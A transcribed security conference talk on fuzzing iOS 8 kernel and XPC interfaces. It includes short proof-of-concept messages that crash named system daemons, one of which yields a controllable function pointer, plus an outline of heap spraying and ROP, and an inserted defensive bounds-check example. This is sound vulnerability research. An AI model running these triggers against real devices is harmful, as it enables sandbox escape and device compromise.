Review And Exploit Neglected Attack Surface In IOS 8


Review and Exploit Neglected Attack Surface in iOS 8
Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGU
BlackHat 2015

Agenda
- iOS Security Background
- Review of Attack Surfaces
- Fuzz More IOKit and MIG System
- Exploit Userland XPC Services
- Conclusion

iOS Security Background
- Sandbox
- Code Sign
- Exploit Mitigation
- Data Protection
- Even hypervisor?


Userland Local Attack Surface
- USB cable: file access interface, backup/restore interface, app management interface, developer interface
- Installed app: Jekyll App (USENIX Security 2013), Masque Attacks (FireEye Research)

Userland Remote Attack Surface
- Any network connection could be an attack surface
- Mobile Safari: JailbreakMe, Mobile Pwn2Own
- Messenger: CVE-2009-2204, SMS vulnerability, Charlie Miller; CVE-2015-1157, crafted Unicode text reboot bug
- System network daemons: CVE-2015-1118, crafted configuration profile reboot bug

Kernel Attack Surface
- Any communication channel between the user space and the kernel is an attack surface
- (diagram) User Space -> BSD System Calls / Mach Trap -> Kernel

Kernel Attack Surface
- Take a further look
- (diagram) User Space -> ioctl / File System / Devices / IOKit / MIG -> Kernel

Kernel Attack Surface: File System
- HFS legacy volume name stack buffer overflow: JailbreakMe 3 for iOS 4.2.x
- HFS heap overflow: Corona for iOS 5.0

Kernel Attack Surface: POSIX System Calls
- posix_spawn improperly checks file action data: p0sixspwn for iOS 6.1.3

Kernel Attack Surface: ioctl
- Packet Filter kernel exploit: DIOCADDRULE ioctl handler improper initialization, decrement value of any kernel address: limera1n/greenpois0n for iOS 4.1

Kernel Attack Surface: /dev/*
- ptmx_get ioctl out-of-bounds memory access: no bounds check of the minor number of the ptmx device: evasi0n7 for iOS 7.0.x

Kernel Attack Surface: IOKit - too many 0.0
- IOSurface, IOMobileFrameBuffer, IOUSBDeviceFamily, IOSharedDataQueue, IOHIDFamily

This Talk
- Kernel space: improve IOKit fuzzing; more IOKit; MIG system
- User space: XPC fuzzing


iOS Kernel Fuzzing
- IOKit is the best target for kernel fuzzing
- Most IOKit fuzzers focus on IOConnectCallMethod -> IOUserClient::externalMethod -> IOUserClient::getTargetAndMethodForIndex

Improve IOKit Fuzzing
- IOConnectCallMethod -> io_connect_method
- io_connect_method calls mach_msg to trap into the kernel
- IOConnectCallMethod is just a wrapper, BUT it affects how the kernel deals with the input/output structures:
  - Size > 4096: uses IOMemoryDescriptor to map the memory
  - Size <= 4096: directly calls copyin/copyout to access the memory

Improve IOKit Fuzzing

Improve IOKit Fuzzing
- Directly call io_connect_method rather than IOConnectCallMethod
  - Able to bypass the size restriction
  - May fuzz more parts of IOKit
- Example: CVE-2014-4487
  - The vulnerable code is for overly large output structures
  - But it can be triggered by very small output structures by calling io_connect_method directly

Improve IOKit Fuzzing
- DO NOT forget info leak bugs
- Check for possible kernel space addresses in all outputs during fuzzing

More IOKit Fuzzing
- Shared Memory
- Traps

Shared Memory of IOKit
- IOKit can share data directly with user space apps
- Assumes user space apps know the structure of the data
- User space apps just need to call IOConnectMapMemory after successfully calling IOServiceOpen
- memoryType may be meaningful for IOKit extensions

Shared Memory of IOKit: how the kernel handles it
- Override the IOUserClient::clientMemoryForType function
- Return an IOMemoryDescriptor object
- Example code (slide screenshot, not transcribed)

Shared Memory of IOKit: improve fuzzing
- Try to open shared memory of IOKit
- Randomly fill the shared memory while fuzzing io_connect_method
- Examples: CVE-2014-4418 - IODataQueue; CVE-2014-4388 - IODataQueue; CVE-2014-4461 - IOSharedDataQueue
- The kernel should not trust shared memory data that could be modified by userspace apps

IOKit Traps
- User space function IOConnectTrap[0-6] -> iokit_user_client_trap
- Input: index - function selector; p1 ... p6 - six input parameters

IOKit Traps: how the kernel handles it
- Get the IOExternalTrap structure from the index
- Directly call the function pointer in IOExternalTrap - no more checks

IOKit Traps
- IOKit extensions may override two functions: getTargetAndTrapForIndex (most likely to override this one) and getExternalTrapForIndex

IOKit Traps: Fuzzing
- Locate overridden functions - determine the range of index
- Tips: the IOExternalTrap definition is different from the XNU source:

    struct IOExternalTrap {
        IOService *object;
        IOTrap func;   // if flag == 0, func is the real function pointer
        int flag;      // if flag == 1, real function = *(IOTrap *)(vtable + func)
    };

MIG System
- Lots of APIs finally call mach_msg to trap into the kernel: mach_vm_* / mach_port_* / io_connect_* / ...
- IDA of io_service_close: mach_msg_header_t.msgh_id (screenshot, not transcribed)

MIG System: how the kernel handles it
- ipc_kobject_server finds the mig_hash_t structure in mig_buckets according to msgh_id
- Calls mig_hash_t.routine

MIG System
- Locate mig_buckets to know all valid msgh_id values
- The mig_init function initializes mig_buckets
- mig_e stores all subsystem definitions

MIG System: mig_e in the XNU source (code screenshot, not transcribed)

MIG System: mig_e in IDA - get all useful information (screenshot, not transcribed)

MIG System: idea of fuzzing the MIG system
- Roughly fuzz all functions
- Accurately fuzz each function: need to analyze the structure inside the message

IOKit Traps 0day
- IOStreamUserClient::getTargetAndTrapForIndex
- Restricts index <= 2, but there are only two IOExternalTrap elements in the array!
- This code is just UNBELIEVABLE 0.0
- Still unfixed in iOS 8.4.1


IPC on iOS/OS X
- iOS and Mac OS X provide a large number of IPC mechanisms (diagram: Process / Sandbox): Apple Events, Shared Memory, Pipes, Distributed Objects, Services, Sockets, Mach Message, XPC
- Two of the most commonly used ways: Mach Message and XPC

Previous Work on Mach Message
- Mach messages are the foundation of IPC
- Through the mach trap mach_msg_overwrite_trap
- Mining Mach Services within OS X Sandbox. Meder Kydyraliev, 2013
- Hacking at Mach 2. Dai Zovi, 2011
- Hacking at Mach Speed. Dai Zovi, 2011

XPC
- Introduced in OS X 10.7 Lion and iOS 5 in 2011
- Built on Mach messages, and simplifies the low-level details of IPC
- Simple interface to look up services by name
- Simple to send and receive asynchronous messages
- Strongly-typed messages

XPC Services on iOS (Server)

    xpc_connection_t listener = xpc_connection_create_mach_service("com.apple.xpc.example", NULL, XPC_CONNECTION_MACH_SERVICE_LISTENER);
    xpc_connection_set_event_handler(listener, ^(xpc_object_t peer) {
        // Connection dispatch
        xpc_connection_set_event_handler(peer, ^(xpc_object_t event) {
            // Message dispatch
            xpc_type_t type = xpc_get_type(event);
            if (type == XPC_TYPE_DICTIONARY) {
                // Message handler
            }
        });
        xpc_connection_resume(peer);
    });
    xpc_connection_resume(listener);

- Use xpc_connection_create_mach_service() to set up a named system service on iOS
- The name of the service (reserved in MachServices of system plist files)
- XPC_CONNECTION_MACH_SERVICE_LISTENER indicates a server
- xpc_connection_set_event_handler is called to specify the connection handlers
- xpc_connection_set_event_handler is called again to specify the message handlers
- Parse the XPC dictionary and handle the data

XPC Services on iOS (Client)

    xpc_connection_t client = xpc_connection_create_mach_service("com.apple.xpc.example", NULL, 0);
    xpc_connection_set_event_handler(client, ^(xpc_object_t event) {
        // connection err handler
    });
    xpc_connection_resume(client);
    xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_double(message, "value1", 1.0);
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(client, message);

- 0 indicates a client
- Create an XPC dictionary
- Insert a double value in the message
- Send the message to the server and get a reply

XPC Dataflow (diagram)
- Sender: xpc objects -> Serialization -> Mach message
- Receiver: Mach message -> Deserialization -> xpc dict -> Object Dereference -> Data Dereference -> Raw Data

Type Confusion Vulnerabilities (same dataflow diagram: Sender: xpc objects -> Serialization -> Mach message; Receiver: Deserialization -> xpc dict -> Object Dereference -> Data Dereference -> Raw Data)
- Auditing and Exploiting Apple IPC. Ian Beer, 2015

Type Confusion Vulnerabilities

    // get an object in an untrusted message
    xpc_object_t value = xpc_dictionary_get_value(untrustedMessage, "key");
    // presume it is an xpc data type and do not perform type validations
    void *ptr = xpc_data_get_bytes_ptr(value);

- Please refer to Ian Beer's work for exploit details

Apple's Fix (same snippet as on the previous slide)
- Perform type checks in all xpc_*_get_* APIs, which eliminates MANY type confusions

Our work: Focus on the receiver side of the dataflow (diagram: xpc dict -> Object Dereference -> Data Dereference -> xpc objects / Raw Data)

Passive Fuzzing
- Select a target service, hook the xpc_connection_set_event_handler() function to get the message handlers
- Hook the message handlers and mutate all received messages

Proactive Fuzzing
- Find all connectable services by decompiling the container sandbox profile
- Grep xpc_connection_create_mach_service to identify all XPC listeners (XPC_CONNECTION_MACH_SERVICE_LISTENER)

Retrieve Message Keys
- Use an IDAPython script to find all xrefs of xpc_dictionary_get_* and analyze the strings in R1

Fuzzing Results
- Ran the fuzzer on iOS 8.2 (the latest version at that moment)
- Crash analysis: null pointer, out-of-bounds memory access, "remote" code execution
- Some crashes might be fixed in iOS 8.4.

Null Pointer Dereference (calaccessd)
- Services presume the existence of certain keys
- ...framework/Support/calaccessd

    xpc_connection_t client = xpc_connection_create_mach_service("com.apple.calaccessd.xpc", NULL, 0);
    xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {});
    xpc_connection_resume(client);
    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_int64(dict, "message", 1);
    // any message with the "function" key can trigger the crash
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(client, dict);

Out-of-Bounds Read (...mework/CVMServer)
- POC:

    // construct and send the handshake message
    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_int64(dict, "message", 1);
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(client, dict);
    xpc_dictionary_set_int64(dict, "message", 4);
    xpc_dictionary_set_string(dict, "framework_name", "OpenCLCPU");
    xpc_dictionary_set_string(dict, "bitcode_name", "");
    xpc_dictionary_set_string(dict, "plugin_name", "");
    reply = xpc_connection_send_message_with_reply_sync(client, dict);

More Memory Errors in libsystem_configuration.dylib

    dns_config_t *
    dns_configuration_copy()
    {
        ...
        reply = libSC_send_message_with_reply_sync(dnsinfo_client, reqdict);
        if (reply != NULL) {
            ...
            dataRef = xpc_dictionary_get_data(reply, DNSINFO_CONFIGURATION, &dataLen);
            ...
            if (n_padding <= (DNS_CONFIG_BUF_MAX - dataLen)) {
                size_t len;
                len = dataLen + n_padding;
                buf = malloc(len);
                bcopy((void *)dataRef, buf, dataLen);
                bzero(&buf[dataLen], n_padding);
            }
        }
        if (buf != NULL) {
            /* ALIGN: cast okay since _dns_config_buf_t is int aligned */
            config = expand_config((_dns_config_buf_t *)(void *)buf);
        }
        ...
    }

    static dns_config_t *
    expand_config(_dns_config_buf_t *buf)
    {
        ...
        padding = &buf->attribute[ntohl(buf->n_attribute)];
        n_padding = ntohl(buf->n_padding);
        ...
    }

- reply is passed from the "server"
- dataRef is retrieved from reply
- dataRef propagates to buf
- buf is passed to expand_config
- buf->n_attribute is used as an array index
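The defensive counterpart of the path the slides trace, as an added example that is not from the deck or from Apple's configd source: every length carried in the reply is checked against dataLen before it becomes an index or an allocation size. The struct layout, CFG_BUF_MAX, the function names and the sample replies are assumptions constructed for this example, not Apple's definitions.

```c
#include <arpa/inet.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define CFG_BUF_MAX (1024 * 1024)  /* assumed cap standing in for DNS_CONFIG_BUF_MAX */

/* Simplified model of the reply buffer (not Apple's _dns_config_buf_t): a fixed
 * header, n_attribute bytes of attributes, then n_padding bytes to zero-fill. */
typedef struct {
    uint32_t config_placeholder; /* stands in for the dns_config_t header */
    uint32_t n_attribute;        /* network byte order, untrusted */
    uint32_t n_padding;          /* network byte order, untrusted */
    uint8_t  attribute[];        /* [n_attribute] */
} cfg_buf_t;

/* Check every length in the header against the bytes actually received.
 * Returns 0 when consistent, -1 when the reply is malformed. */
int cfg_validate(const uint8_t *data, size_t dataLen)
{
    if (data == NULL || dataLen < sizeof(cfg_buf_t) || dataLen > CFG_BUF_MAX) return -1;
    const cfg_buf_t *hdr = (const cfg_buf_t *)data;
    uint32_t n_attribute = ntohl(hdr->n_attribute), n_padding = ntohl(hdr->n_padding);
    /* &attribute[n_attribute] must stay inside the received bytes ... */
    if (n_attribute > dataLen - sizeof(cfg_buf_t)) return -1;
    /* ... and the expanded copy, dataLen + n_padding, must not exceed the cap */
    if (n_padding > CFG_BUF_MAX - dataLen) return -1;
    return 0;
}

/* Copy-and-expand step: allocate dataLen + n_padding, copy, zero the tail, and
 * only then derive the padding pointer from buf->n_attribute. NULL if rejected. */
uint8_t *cfg_copy_expand(const uint8_t *data, size_t dataLen, uint8_t **padding_out)
{
    if (cfg_validate(data, dataLen) != 0) return NULL;
    const cfg_buf_t *hdr = (const cfg_buf_t *)data;
    uint32_t n_attribute = ntohl(hdr->n_attribute), n_padding = ntohl(hdr->n_padding);
    uint8_t *buf = malloc(dataLen + n_padding);
    if (buf == NULL) return NULL;
    memcpy(buf, data, dataLen);
    memset(buf + dataLen, 0, n_padding);
    if (padding_out != NULL)
        *padding_out = &((cfg_buf_t *)buf)->attribute[n_attribute];
    return buf;
}

/* Constructed sample reply (not real daemon output): the header claims
 * n_attribute/n_padding while only attr_bytes of attribute data follow.
 * Returns the padding pointer's offset into the copy, or -1 if rejected. */
long cfg_expand_sample(uint32_t n_attribute, uint32_t n_padding, size_t attr_bytes)
{
    _Alignas(uint32_t) uint8_t wire[64];
    if (sizeof(cfg_buf_t) + attr_bytes > sizeof(wire)) return -1;
    cfg_buf_t *h = (cfg_buf_t *)wire;
    h->config_placeholder = 0;
    h->n_attribute = htonl(n_attribute);
    h->n_padding   = htonl(n_padding);
    memset(h->attribute, 0xAB, attr_bytes);
    size_t dataLen = sizeof(cfg_buf_t) + attr_bytes;
    uint8_t *padding = NULL;
    uint8_t *copy = cfg_copy_expand(wire, dataLen, &padding);
    if (copy == NULL) return -1;
    long off = (long)(padding - copy);
    free(copy);
    return off;
}
```

An honest reply (n_attribute equal to the attribute bytes actually sent) is accepted and the padding pointer lands exactly at dataLen; a reply whose n_attribute or n_padding exceeds what was received is rejected before any index or malloc size is derived from it.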

A Surprise in com.apple.iaptransportd.xpc
- v29 is retrieved from the XPC message; *(*v29 + 32) is used as a function pointer
- ...work/Support/iaptransportd

    xpc_connection_t client = xpc_connection_create_mach_service("com.apple.iaptransportd.xpc", NULL, 0);
    xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {});
    xpc_connection_resume(client);
    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_string(dict, "requestType", "setPortLockout");  // requestType must be setPortLockout
    xpc_dictionary_set_uint64(dict, "portID", 0xAAAAAAAA);             // *(*portID + 32) will be the function pointer
    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(client, dict);

How to Exploit it
- How to control *(*portID + 32)? Where to find ROP gadgets?
- Heap spraying; the dyld shared cache is shared among all processes and has the same layout
- Effects: exploitable by any container app; bypasses the container sandbox to access the system


Conclusion
- The combination of previous techniques and new improvements may lead to new findings
- Apple puts more effort into improving the whole security mechanism rather than fixing individual bugs
- Reviewing all old code is necessary for Apple

Thanks for your attention
Q&A
